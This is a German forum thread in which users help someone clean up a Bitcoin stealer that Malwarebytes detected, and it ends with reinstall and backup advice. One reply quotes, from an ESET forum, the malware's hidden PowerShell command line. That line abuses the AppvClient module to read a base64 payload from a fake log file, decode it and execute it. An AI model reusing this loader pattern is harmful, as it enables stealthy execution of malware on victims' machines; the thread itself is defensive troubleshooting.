Malwarebytes blockiert dauernd spezifische website findet aber keine Viren mehr

birdskywinter

Lt. Commander
Registriert
Juni 2019
Beiträge
1.175
Hallo,

ich habe einen Scan gemacht und dabei wurde ein Bitcoin Stealer gefunden. Nun verhindert es aber auch immer noch den Aufruf einer Website. Hat jemand eine Ahnung was das ist? Diese Meldung kommt unabhängig davon ob ein Browser geöffnet ist im Minutentakt wieder. Ich werde eh neu instalieren aber eine Woche muss es noch so gehen:
 

Anhänge

  • reiiiiii.PNG
    reiiiiii.PNG
    39,7 KB · Aufrufe: 309
  • CaptureRRRRRR.PNG
    CaptureRRRRRR.PNG
    14,2 KB · Aufrufe: 293
Hi

Dann lösche die Datei doch einfach , solltest aber vom USB Stick Booten , um dann mit STRG oder Shift F10 eine einhabeauforderung zu Starten !

mfg.
 
Da wird ein Powershellscript aufgerufen.

Spybot search destroy versuchen
Ansonst bleibt nur manuell suchen
 
  • Gefällt mir
Reaktionen: Yesman9277
Die Datei darf nicht gelöscht werden.
Powershell ist ein Bestandteil des Betriebssystems.

Offensichtlich ruft ein Programm via Powershell die URL auf.

Du kannst das System mal mit AdwCleaner checken:
https://de.malwarebytes.com/adwcleaner/
 
  • Gefällt mir
Reaktionen: piepenkorn
@PC295

Jetzt wo man mal gesehen hat wo die Datei liegt ja , nur scheint diese wohl Modifierziert zu sein evlt. !

@birdskywinter


Lösche diese Datei trodzdem mal , und kopiere sie von bsp. : c:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_6.3.9600.17415_none_5a20f99ad5f01680\ oder suche einfach mal nach powershell.exe , oder am besten vergleiche mal beide Dateien vorher , oder lade deine aus c:\Windows\System32\WindowsPowerShell\v1.0\ und aus dem WinsXs bei Virustotal hoch.

Und suche mal nach so Powershell Script Dateien *.ps usw

https://learn.microsoft.com/de-de/p...he-windows-powershell-ise?view=powershell-7.3

mfg.
 
Nach dem Malwarebytesscan wurden ja alles gefundene in Quarantäne geschoben. Dann kamen aber immer noch die Aufrufe dieser IP. Nach einem Neustart tritt das jetzt nicht mehr auf. Was soll ich davon halten?
Die Powershell exe scheint nicht modifiziert zu sein.
Ergänzung ()

btw. wie kann sich ein Bitcoin Stealer in einer Textdatei verstecken, kann das überhaupt richtig sein?
 

Anhänge

  • Capturerrrrrrrrrrrrrrrrrrrrrrrr.PNG
    Capturerrrrrrrrrrrrrrrrrrrrrrrr.PNG
    5 KB · Aufrufe: 177
birdskywinter schrieb:
btw. wie kann sich ein Bitcoin Stealer in einer Textdatei verstecken, kann das überhaupt richtig sein?
Also ja. Theoretisch kann sich Malware da verstecken. Die Frage bei Malware ist aber, wie kann sie zur Ausführung gelangen. Und da sind .txt-Dateien eher ungünstig für.
Wenn dann wird es noch weiteren Code brauchen der dann z.B. den aus der .txt nachlädt. Das wäre durchaus eine Verschleierungstaktik. Halt darauf zu setzen das .txt Dateien nicht gescannt werden, weil sie ja eigentlich harmlos sind.
Aber das sind jetzt alles Spekulationen. Da müsste man mal einen genaueren Blick drauf werfen.
 
birdskywinter schrieb:
btw. wie kann sich ein Bitcoin Stealer in einer Textdatei verstecken, kann das überhaupt richtig sein?
Die Datei gehört da nicht hin. Zumal Logs dort typischerweise die Dateiendung .log haben.
Hast du die Datei schon gelöscht?
 
@birdskywinter

Klar kein problem , oder hat ne doppel änderung , der Explorer erkennt nur eine , bzw. eigentlich gar keine , mit dem Total Commander oder andere Datei Manager , findest du auch solche Dateien , lade doch mal diese Log datei auf Virustotal hoch.

auch gut zum überwachen !

mfg.
 
Zuletzt bearbeitet:
birdskywinter schrieb:
btw. wie kann sich ein Bitcoin Stealer in einer Textdatei verstecken, kann das überhaupt richtig sein?
Dort könnte das entsprechende Powershellscript drin sein, welches durch die Powershell ausgeführt werden soll.
Ich tippe mal auf einen Scheduled Task, der das versucht, auszuführen.
 
@kartoffelpü

ja auch möglich.

@birdskywinter

Schau mal mit regedit.exe unter zb.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\
nach , falls der Tasmanager , Regedit usw. überhaupt noch Funktionieren , die meisten Trojander Deaktivieren diese , bzw, nennt man das auch Entführen.

Es ist allerdings Wichtig , das man diese vorher gemacht hat , in so einem Fall


Aha , Arbeitet wohl nach dem Gleichen verhaltensmuster
I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

Find C:\Windows\logs\system-logs.txt , find these strings

Quelle:
https://forum.eset.com/topic/32186-two-strange-powershell-processes-maybe-coinminers/

Stell mal deine System-logs.txt hier zur verfügung , aber bitte gezippt , für User die in einer VM Unterwegs sind !

Ich gehe aber mal stark davon aus , wenn du diese log löschst , dann Funktioniert das Script nicht mehr , vorrausgetzt die log, wird nicht neu erstellt durch eine Payload !

https://www.virustotal.com/gui/url/...8d06ed4d9e036480e66ae1dc57391c014ef?nocache=1

Wird auch noch in DE gehostet :D
https://utrace.me/whois/194.163.154.226
Würde ich mal bei Contabo in München Reporten , das diese Seite evlt. als Viren/Trojaner Schleuder missbraucht wird , ob nun mit voller absicht , oder unfreiwillig !

mfg.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: kartoffelpü
birdskywinter schrieb:
Nach dem Malwarebytesscan wurden ja alles gefundene in Quarantäne geschoben. Dann kamen aber immer noch die Aufrufe dieser IP. Nach einem Neustart tritt das jetzt nicht mehr auf. Was soll ich davon halten?
Ich verstehe gerade die Diskussion über die PowerShell nicht.
Rechner komplett plätten und neu aufsetzen, alles andere fände ich grob fahrlässig.

Und ggfs. überdenken, wie die Malware auf den Rechner kam - sonst passiert das mit dem frischen System gleich wieder.
 
  • Gefällt mir
Reaktionen: kartoffelpü und andy_m4
Sieht erst mal wie ne normale Textdatei (Log-Datei) aus.
Code:
To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113
08/23/2021 00:22:00.572 [21868]: NGen Task starting, command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:604
08/23/2021 00:22:00.655 [21868]: Attempting to acquire task lock.
08/23/2021 00:22:00.665 [21868]: Acquired task lock.
08/23/2021 00:22:00.734 [12724]: Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe RemoveTaskDelayStartTrigger /LegacyServiceBehavior
08/23/2021 00:22:00.764 [12724]: ngen returning 0x00000000
08/23/2021 00:22:00.776 [21868]: Not creating new native images due to disk space or quota limit
08/23/2021 00:22:00.804 [21868]: Executing normal maintenance tasks
08/23/2021 00:22:00.855 [9556]: Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe ExecuteQueuedItems /LegacyServiceBehavior
08/23/2021 00:23:50.250 [9556]: Failed to load the runtime. (Exception from HRESULT: 0x80131700). Assembly Microsoft.Office.Tools.Common.Implementation.resources, Version=10.0.0.00000, Culture=de, PublicKeyToken=B03F5F7F11D50A3A requires version v4.0 of the runtime to run.

Allerdings scheint die Datei bei virustotal.com bekannt zu sein:
system-logs.txt (55d612e2e9c052c72e9ad1cd6b2fa3e6810875bb76ef073d525f3bc3ad29ca0f)
 
  • Gefällt mir
Reaktionen: kartoffelpü, birdskywinter und andy_m4
Hier mal noch ein bespiel , wie das aussehen kann , wenn seiten dazu missbraucht werden ob nun Frei oder unfreiwillig , und wie du es verhindern kannst !


mfg.
 
Ich verstehe gerade die Diskussion über die PowerShell nicht.
Rechner komplett plätten und neu aufsetzen, alles andere fände ich grob fahrlässig.
Wollte ich auch gerade schreiben er soll eine Windows 10 Neuinstallation machen nachdem er vorher eine Datensicherung gemacht hat und wenn es neu alles eingerichtet ist, für jeden Browser uBlock origin benutzen, der schützt auch vor Krypto Trojaner und dann soll er mit einem Backup Programm wie Aomei Backupper dessen Pro Version immer wieder so wie jetzt als kostenlose Jahreslizenz verschenkt wird regelmässig Systembackups von C Windows machen oder Festplattenbackups wenn er noch andere Partitionen mit eingerichtet hat. Und als Speicherort für die Backups bitte eine externe USB Festplatte oder ein NAS verwenden und nicht Backups machen auf eine im PC verbaute Festplatte und die USB Festplatte oder das NAS sollten nur für Backup Aufgaben angeschlossen werden.
 
purzelbär schrieb:
und die USB Festplatte oder das NAS sollten nur für Backup Aufgaben angeschlossen werden.
Idealerweise bootet man vor dem anschließen der externen Backup-Festplatte von einem Live-System. Dann ist sicher gestellt, das Du auch in einem sauberen System bist. Ransomware kann nämlich auch gerne schon mal warten bis auch das Backupmedium erreichbar ist und dann ist plötzlich alles futsch.
 
  • Gefällt mir
Reaktionen: birdskywinter
Zurück
Oben